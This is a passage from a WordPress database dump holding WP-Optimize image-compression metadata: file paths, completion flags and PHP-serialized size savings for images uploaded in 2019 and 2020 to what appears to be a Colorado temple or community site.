WP-Optimize'),(164489,198904,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:20506;s:12:\"smushed-size\";i:19535;s:15:\"savings-percent\";d:4.7400000000000002131628207280300557613372802734375;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:20506;s:10:\"compressed\";i:19535;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10929;s:10:\"compressed\";i:9844;}s:6:\"medium\";a:2:{s:8:\"original\";i:22021;s:10:\"compressed\";i:19862;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2297;s:10:\"compressed\";i:1864;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:23975;s:10:\"compressed\";i:21703;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:17156;s:10:\"compressed\";i:15429;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:20685;s:10:\"compressed\";i:18668;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14534;s:10:\"compressed\";i:13059;}}}'),(164490,198905,'original-file','2019/10/poppy-field-updraft-pre-smush-original.jpg'),(164491,198905,'smush-complete','1'),(164492,198905,'smush-info','The file was compressed from 38.59 KB to 36.13 KB saving 6.37 percent using WP-Optimize'),(164493,198905,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:39512;s:12:\"smushed-size\";i:36996;s:15:\"savings-percent\";d:6.37000000000000010658141036401502788066864013671875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:39512;s:10:\"compressed\";i:36996;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15033;s:10:\"compressed\";i:13631;}s:6:\"medium\";a:2:{s:8:\"original\";i:31824;s:10:\"compressed\";i:28784;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2317;s:10:\"compressed\";i:1911;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:39579;s:10:\"compressed\";i:36143;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23377;s:10:\"compressed\";i:21143;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:35337;s:10:\"compressed\";i:32011;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:20953;s:10:\"compressed\";i:18965;}}}'),(164494,198976,'original-file','2019/10/butterfly-tulips-updraft-pre-smush-original.jpg'),(164495,198976,'smush-complete','1'),(164496,198976,'smush-info','The file was compressed from 25.94 KB to 24.58 KB saving 5.23 percent using WP-Optimize'),(164497,198976,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:26561;s:12:\"smushed-size\";i:25171;s:15:\"savings-percent\";d:5.230000000000000426325641456060111522674560546875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:26561;s:10:\"compressed\";i:25171;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12631;s:10:\"compressed\";i:11376;}s:6:\"medium\";a:2:{s:8:\"original\";i:27002;s:10:\"compressed\";i:24444;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2467;s:10:\"compressed\";i:2004;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29846;s:10:\"compressed\";i:27112;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:20729;s:10:\"compressed\";i:18690;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:25348;s:10:\"compressed\";i:22966;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17402;s:10:\"compressed\";i:15683;}}}'),(164498,198977,'original-file','2019/10/sphere-nature-1-updraft-pre-smush-original.jpg'),(164499,198977,'smush-complete','1'),(164500,198977,'smush-info','The file was compressed from 23.73 KB to 22.15 KB saving 6.63 percent using WP-Optimize'),(164501,198977,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:24298;s:12:\"smushed-size\";i:22686;s:15:\"savings-percent\";d:6.62999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:24298;s:10:\"compressed\";i:22686;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13240;s:10:\"compressed\";i:11856;}s:6:\"medium\";a:2:{s:8:\"original\";i:27952;s:10:\"compressed\";i:25005;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2369;s:10:\"compressed\";i:1933;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:29701;s:10:\"compressed\";i:26782;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21277;s:10:\"compressed\";i:18994;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:26539;s:10:\"compressed\";i:23756;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:17625;s:10:\"compressed\";i:15769;}}}'),(164502,198978,'original-file','2019/10/white-puppies-updraft-pre-smush-original.jpg'),(164503,198978,'smush-complete','1'),(164504,198978,'smush-info','The file was compressed from 23.35 KB to 22.16 KB saving 5.08 percent using WP-Optimize'),(164505,198978,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:23910;s:12:\"smushed-size\";i:22695;s:15:\"savings-percent\";d:5.0800000000000000710542735760100185871124267578125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:23910;s:10:\"compressed\";i:22695;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12026;s:10:\"compressed\";i:10897;}s:6:\"medium\";a:2:{s:8:\"original\";i:24245;s:10:\"compressed\";i:21987;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2246;s:10:\"compressed\";i:1819;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:28560;s:10:\"compressed\";i:26239;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18367;s:10:\"compressed\";i:16665;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:27341;s:10:\"compressed\";i:24898;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16338;s:10:\"compressed\";i:14852;}}}'),(164506,204589,'original-file','2019/12/co-EK-BGrid-logo-title-image-updraft-pre-smush-original.png'),(164507,204589,'smush-complete','1'),(164508,204589,'smush-info','The file was compressed from 10.29 KB to 4.93 KB saving 52.12 percent using WP-Optimize'),(164509,204589,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:10542;s:12:\"smushed-size\";i:5048;s:15:\"savings-percent\";d:52.11999999999999744204615126363933086395263671875;s:10:\"sizes-info\";a:5:{s:4:\"full\";a:2:{s:8:\"original\";i:10542;s:10:\"compressed\";i:5048;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5090;s:10:\"compressed\";i:3055;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2837;s:10:\"compressed\";i:2222;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:15346;s:10:\"compressed\";i:6962;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:8086;s:10:\"compressed\";i:4078;}}}'),(164510,204591,'original-file','2019/12/favicon2-updraft-pre-smush-original.png'),(164511,204591,'smush-complete','1'),(164512,204591,'smush-info','The file was compressed from 37.63 KB to 16.92 KB saving 55.04 percent using WP-Optimize'),(164513,204591,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:38531;s:12:\"smushed-size\";i:17325;s:15:\"savings-percent\";d:55.03999999999999914734871708787977695465087890625;s:10:\"sizes-info\";a:11:{s:4:\"full\";a:2:{s:8:\"original\";i:38531;s:10:\"compressed\";i:17325;}s:6:\"medium\";a:2:{s:8:\"original\";i:33791;s:10:\"compressed\";i:14752;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11116;s:10:\"compressed\";i:5442;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:39927;s:10:\"compressed\";i:18502;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2138;s:10:\"compressed\";i:1856;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25545;s:10:\"compressed\";i:11588;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14417;s:10:\"compressed\";i:6790;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:75577;s:10:\"compressed\";i:34421;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14883;s:10:\"compressed\";i:6985;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:32774;s:10:\"compressed\";i:14973;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:34874;s:10:\"compressed\";i:17074;}}}'),(164514,204592,'original-file','2019/12/cropped-favicon2-updraft-pre-smush-original.png'),(164515,204592,'smush-complete','1'),(164516,204592,'smush-info','The file was compressed from 34.11 KB to 16.71 KB saving 51.02 percent using WP-Optimize'),(164517,204592,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:34929;s:12:\"smushed-size\";i:17107;s:15:\"savings-percent\";d:51.02000000000000312638803734444081783294677734375;s:10:\"sizes-info\";a:14:{s:4:\"full\";a:2:{s:8:\"original\";i:34929;s:10:\"compressed\";i:17107;}s:6:\"medium\";a:2:{s:8:\"original\";i:33791;s:10:\"compressed\";i:14752;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11116;s:10:\"compressed\";i:5442;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:39927;s:10:\"compressed\";i:18502;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2138;s:10:\"compressed\";i:1856;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25545;s:10:\"compressed\";i:11588;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:14417;s:10:\"compressed\";i:6790;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:75577;s:10:\"compressed\";i:34421;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:14883;s:10:\"compressed\";i:6985;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:32774;s:10:\"compressed\";i:14973;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:34874;s:10:\"compressed\";i:17074;}s:13:\"site_icon-270\";a:2:{s:8:\"original\";i:27741;s:10:\"compressed\";i:12602;}s:13:\"site_icon-192\";a:2:{s:8:\"original\";i:11748;s:10:\"compressed\";i:5753;}s:12:\"site_icon-32\";a:2:{s:8:\"original\";i:1237;s:10:\"compressed\";i:1237;}}}'),(164518,204616,'original-file','2019/12/co-EK-BGrid-logo-title-image-lg-updraft-pre-smush-original.png'),(164519,204616,'smush-complete','1'),(164520,204616,'smush-info','The file was compressed from 21.46 KB to 9.55 KB saving 55.49 percent using WP-Optimize'),(164521,204616,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21973;s:12:\"smushed-size\";i:9781;s:15:\"savings-percent\";d:55.49000000000000198951966012828052043914794921875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:21973;s:10:\"compressed\";i:9781;}s:6:\"medium\";a:2:{s:8:\"original\";i:17674;s:10:\"compressed\";i:8217;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6218;s:10:\"compressed\";i:3118;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:17729;s:10:\"compressed\";i:7875;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2659;s:10:\"compressed\";i:2191;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:10393;s:10:\"compressed\";i:4856;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:13553;s:10:\"compressed\";i:6398;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:8141;s:10:\"compressed\";i:3965;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:14997;s:10:\"compressed\";i:6801;}}}'),(164522,205232,'original-file','2019/12/eck-temple-member-cal-promo-updraft-pre-smush-original.jpg'),(164523,205232,'smush-complete','1'),(164524,205232,'smush-info','The file was compressed from 34.73 KB to 32.92 KB saving 5.21 percent using WP-Optimize'),(164525,205232,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:35564;s:12:\"smushed-size\";i:33710;s:15:\"savings-percent\";d:5.20999999999999996447286321199499070644378662109375;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:35564;s:10:\"compressed\";i:33710;}s:6:\"medium\";a:2:{s:8:\"original\";i:27797;s:10:\"compressed\";i:24832;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14121;s:10:\"compressed\";i:12572;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2461;s:10:\"compressed\";i:2011;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:35460;s:10:\"compressed\";i:31991;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:21079;s:10:\"compressed\";i:18751;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:30418;s:10:\"compressed\";i:27163;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:19005;s:10:\"compressed\";i:16924;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:46471;s:10:\"compressed\";i:41955;}}}'),(164526,210314,'original-file','2019/12/members-newsletter-bgrid-2-updraft-pre-smush-original.png'),(164527,210314,'smush-complete','1'),(164528,210314,'smush-info','The file was compressed from 18.88 KB to 8.60 KB saving 54.43 percent using WP-Optimize'),(164529,210314,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19331;s:12:\"smushed-size\";i:8810;s:15:\"savings-percent\";d:54.42999999999999971578290569595992565155029296875;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:19331;s:10:\"compressed\";i:8810;}s:6:\"medium\";a:2:{s:8:\"original\";i:16041;s:10:\"compressed\";i:7610;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6184;s:10:\"compressed\";i:3269;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:20472;s:10:\"compressed\";i:8637;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2429;s:10:\"compressed\";i:1878;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:13591;s:10:\"compressed\";i:6035;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:9169;s:10:\"compressed\";i:4402;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9388;s:10:\"compressed\";i:4527;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:18315;s:10:\"compressed\";i:7908;}}}'),(164530,211084,'original-file','2019/12/members-newsletter-bgrid-4-updraft-pre-smush-original.png'),(164531,211084,'smush-complete','1'),(164532,211084,'smush-info','The file was compressed from 18.82 KB to 8.52 KB saving 54.73 percent using WP-Optimize'),(164533,211084,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:19272;s:12:\"smushed-size\";i:8724;s:15:\"savings-percent\";d:54.72999999999999687361196265555918216705322265625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:19272;s:10:\"compressed\";i:8724;}s:6:\"medium\";a:2:{s:8:\"original\";i:17116;s:10:\"compressed\";i:7562;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6364;s:10:\"compressed\";i:3189;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:21178;s:10:\"compressed\";i:8532;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2546;s:10:\"compressed\";i:1942;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:14084;s:10:\"compressed\";i:5956;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:9601;s:10:\"compressed\";i:4334;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:9756;s:10:\"compressed\";i:4485;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:19131;s:10:\"compressed\";i:7803;}}}'),(164534,243467,'original-file','2020/01/spex-sized-updraft-pre-smush-original.png'),(164535,243467,'smush-complete','1'),(164536,243467,'smush-info','The file was compressed from 61.62 KB to 21.63 KB saving 64.89 percent using WP-Optimize'),(164537,243467,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:63094;s:12:\"smushed-size\";i:22153;s:15:\"savings-percent\";d:64.8900000000000005684341886080801486968994140625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:63094;s:10:\"compressed\";i:22153;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:41552;s:10:\"compressed\";i:15424;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:5706;s:10:\"compressed\";i:3045;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:55646;s:10:\"compressed\";i:20309;}}}'),(164538,243468,'original-file','2020/01/eckco-meetups-sized-updraft-pre-smush-original.png'),(164539,243468,'smush-complete','1'),(164540,243468,'smush-info','The file was compressed from 59.32 KB to 18.89 KB saving 68.16 percent using WP-Optimize'),(164541,243468,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:60748;s:12:\"smushed-size\";i:19342;s:15:\"savings-percent\";d:68.159999999999996589394868351519107818603515625;s:10:\"sizes-info\";a:4:{s:4:\"full\";a:2:{s:8:\"original\";i:60748;s:10:\"compressed\";i:19342;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:39072;s:10:\"compressed\";i:13663;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:5747;s:10:\"compressed\";i:2965;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:52763;s:10:\"compressed\";i:17529;}}}'),(164542,245088,'original-file','2020/01/activities-splash-sized-updraft-pre-smush-original.jpg'),(164543,245088,'smush-complete','1'),(164544,245088,'smush-info','The file was compressed from 84.19 KB to 67.40 KB saving 19.94 percent using WP-Optimize'),(164545,245088,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:86212;s:12:\"smushed-size\";i:69021;s:15:\"savings-percent\";d:19.940000000000001278976924368180334568023681640625;s:10:\"sizes-info\";a:12:{s:4:\"full\";a:2:{s:8:\"original\";i:86212;s:10:\"compressed\";i:69021;}s:6:\"medium\";a:2:{s:8:\"original\";i:31246;s:10:\"compressed\";i:28080;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:14709;s:10:\"compressed\";i:13144;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:54994;s:10:\"compressed\";i:49601;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2566;s:10:\"compressed\";i:2088;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:43616;s:10:\"compressed\";i:39258;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:23570;s:10:\"compressed\";i:21228;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:80849;s:10:\"compressed\";i:73500;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:30376;s:10:\"compressed\";i:27308;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:66875;s:10:\"compressed\";i:60530;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:19744;s:10:\"compressed\";i:17701;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:54170;s:10:\"compressed\";i:48886;}}}'),(164546,247614,'original-file','2020/01/landscape-temple-1-sized-updraft-pre-smush-original.jpg'),(164547,247614,'smush-complete','1'),(164548,247614,'smush-info','The file was compressed from 173.81 KB to 167.26 KB saving 3.77 percent using WP-Optimize'),(164549,247614,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:177978;s:12:\"smushed-size\";i:171276;s:15:\"savings-percent\";d:3.770000000000000017763568394002504646778106689453125;s:10:\"sizes-info\";a:17:{s:4:\"full\";a:2:{s:8:\"original\";i:177978;s:10:\"compressed\";i:171276;}s:6:\"medium\";a:2:{s:8:\"original\";i:30258;s:10:\"compressed\";i:27032;}s:5:\"large\";a:2:{s:8:\"original\";i:215744;s:10:\"compressed\";i:197657;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:15056;s:10:\"compressed\";i:13382;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:138718;s:10:\"compressed\";i:125809;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:58804;s:10:\"compressed\";i:52851;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2470;s:10:\"compressed\";i:2025;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:46387;s:10:\"compressed\";i:41656;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22513;s:10:\"compressed\";i:19997;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:81985;s:10:\"compressed\";i:73819;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:149122;s:10:\"compressed\";i:135616;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:33333;s:10:\"compressed\";i:29754;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:77496;s:10:\"compressed\";i:69903;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:175642;s:10:\"compressed\";i:160271;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:20276;s:10:\"compressed\";i:18065;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:57443;s:10:\"compressed\";i:51522;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:208831;s:10:\"compressed\";i:192146;}}}'),(164550,247828,'original-file','2020/01/co-springs-location-landscape-sized-updraft-pre-smush-original.jpg'),(164551,247828,'smush-complete','1'),(164552,247828,'smush-info','The file was compressed from 222.49 KB to 210.60 KB saving 5.34 percent using WP-Optimize'),(164553,247828,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:227832;s:12:\"smushed-size\";i:215658;s:15:\"savings-percent\";d:5.339999999999999857891452847979962825775146484375;s:10:\"sizes-info\";a:17:{s:4:\"full\";a:2:{s:8:\"original\";i:227832;s:10:\"compressed\";i:215658;}s:6:\"medium\";a:2:{s:8:\"original\";i:34758;s:10:\"compressed\";i:30556;}s:5:\"large\";a:2:{s:8:\"original\";i:258245;s:10:\"compressed\";i:230901;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:16348;s:10:\"compressed\";i:14315;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:166663;s:10:\"compressed\";i:148068;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:70047;s:10:\"compressed\";i:61840;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2582;s:10:\"compressed\";i:2108;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:51974;s:10:\"compressed\";i:45881;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:25280;s:10:\"compressed\";i:22287;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:98256;s:10:\"compressed\";i:86800;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:179700;s:10:\"compressed\";i:159830;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:38738;s:10:\"compressed\";i:34105;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:93279;s:10:\"compressed\";i:82427;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:211986;s:10:\"compressed\";i:188953;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:22596;s:10:\"compressed\";i:19863;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:66371;s:10:\"compressed\";i:58600;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:257653;s:10:\"compressed\";i:230298;}}}'),(164554,247926,'original-file','2020/01/co-springs-location-sized-updraft-pre-smush-original.jpg'),(164555,247926,'smush-complete','1'),(164556,247926,'smush-info','The file was compressed from 33.49 KB to 32.30 KB saving 3.57 percent using WP-Optimize'),(164557,247926,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:34295;s:12:\"smushed-size\";i:33071;s:15:\"savings-percent\";d:3.569999999999999840127884453977458178997039794921875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:34295;s:10:\"compressed\";i:33071;}s:6:\"medium\";a:2:{s:8:\"original\";i:30449;s:10:\"compressed\";i:27827;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12534;s:10:\"compressed\";i:11460;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2328;s:10:\"compressed\";i:1880;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:36868;s:10:\"compressed\";i:34071;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22542;s:10:\"compressed\";i:20530;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:28129;s:10:\"compressed\";i:25600;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18054;s:10:\"compressed\";i:16485;}}}'),(164558,248046,'original-file','2020/01/eck-temple-co-sized-updraft-pre-smush-original.jpg'),(164559,248046,'smush-complete','1'),(164560,248046,'smush-info','The file was compressed from 33.78 KB to 32.13 KB saving 4.88 percent using WP-Optimize'),(164561,248046,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:34592;s:12:\"smushed-size\";i:32904;s:15:\"savings-percent\";d:4.87999999999999989341858963598497211933135986328125;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:34592;s:10:\"compressed\";i:32904;}s:6:\"medium\";a:2:{s:8:\"original\";i:31017;s:10:\"compressed\";i:28175;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:13458;s:10:\"compressed\";i:12238;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2350;s:10:\"compressed\";i:1923;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:38791;s:10:\"compressed\";i:35566;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:22977;s:10:\"compressed\";i:20801;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:28423;s:10:\"compressed\";i:25745;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:18933;s:10:\"compressed\";i:17134;}}}'),(164562,248165,'original-file','2020/01/loveland-landscape-sized-updraft-pre-smush-original.jpg'),(164563,248165,'smush-complete','1'),(164564,248165,'smush-info','The file was compressed from 188.53 KB to 178.74 KB saving 5.19 percent using WP-Optimize'),(164565,248165,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:193053;s:12:\"smushed-size\";i:183031;s:15:\"savings-percent\";d:5.19000000000000039079850466805510222911834716796875;s:10:\"sizes-info\";a:17:{s:4:\"full\";a:2:{s:8:\"original\";i:193053;s:10:\"compressed\";i:183031;}s:6:\"medium\";a:2:{s:8:\"original\";i:26124;s:10:\"compressed\";i:23826;}s:5:\"large\";a:2:{s:8:\"original\";i:225595;s:10:\"compressed\";i:207168;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12397;s:10:\"compressed\";i:11322;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:139152;s:10:\"compressed\";i:127086;}s:20:\"gg_gallery_thumbnail\";a:2:{s:8:\"original\";i:54307;s:10:\"compressed\";i:49571;}s:6:\"wcicon\";a:2:{s:8:\"original\";i:2013;s:10:\"compressed\";i:1607;}s:8:\"wcsquare\";a:2:{s:8:\"original\";i:42599;s:10:\"compressed\";i:38897;}s:7:\"wcsmall\";a:2:{s:8:\"original\";i:18950;s:10:\"compressed\";i:17273;}s:10:\"wcstandard\";a:2:{s:8:\"original\";i:78277;s:10:\"compressed\";i:71357;}s:5:\"wcbig\";a:2:{s:8:\"original\";i:151053;s:10:\"compressed\";i:138181;}s:18:\"wcfixedheightsmall\";a:2:{s:8:\"original\";i:29348;s:10:\"compressed\";i:26785;}s:19:\"wcfixedheightmedium\";a:2:{s:8:\"original\";i:74138;s:10:\"compressed\";i:67569;}s:13:\"wcfixedheight\";a:2:{s:8:\"original\";i:180496;s:10:\"compressed\";i:165044;}s:15:\"wccarouselsmall\";a:2:{s:8:\"original\";i:16922;s:10:\"compressed\";i:15504;}s:10:\"wccarousel\";a:2:{s:8:\"original\";i:53301;s:10:\"compressed\";i:48558;}s:8:\"wcslider\";a:2:{s:8:\"original\";i:240576;s:10:\"compressed\";i:220499;}}}'),(164566,248166,'original-file','2020/01/loveland-center-location-sized-updraft-pre-smush-original.jpg'),(164567,248166,'smush-complete','1'),(164568,248166,'smush-info','The file was compressed from 40.84 KB to 31.68 KB saving 22.43 percent using 